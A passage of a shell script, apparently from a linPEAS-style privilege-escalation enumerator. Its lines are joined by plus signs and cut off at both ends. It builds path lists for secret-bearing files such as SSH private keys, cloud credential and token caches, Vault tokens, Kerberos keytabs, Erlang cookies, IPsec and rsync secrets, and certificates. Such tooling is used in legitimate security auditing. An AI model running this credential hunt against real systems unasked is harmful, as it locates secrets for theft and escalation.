"$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E 'moodle/config.php' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_RACOON=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/private" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e 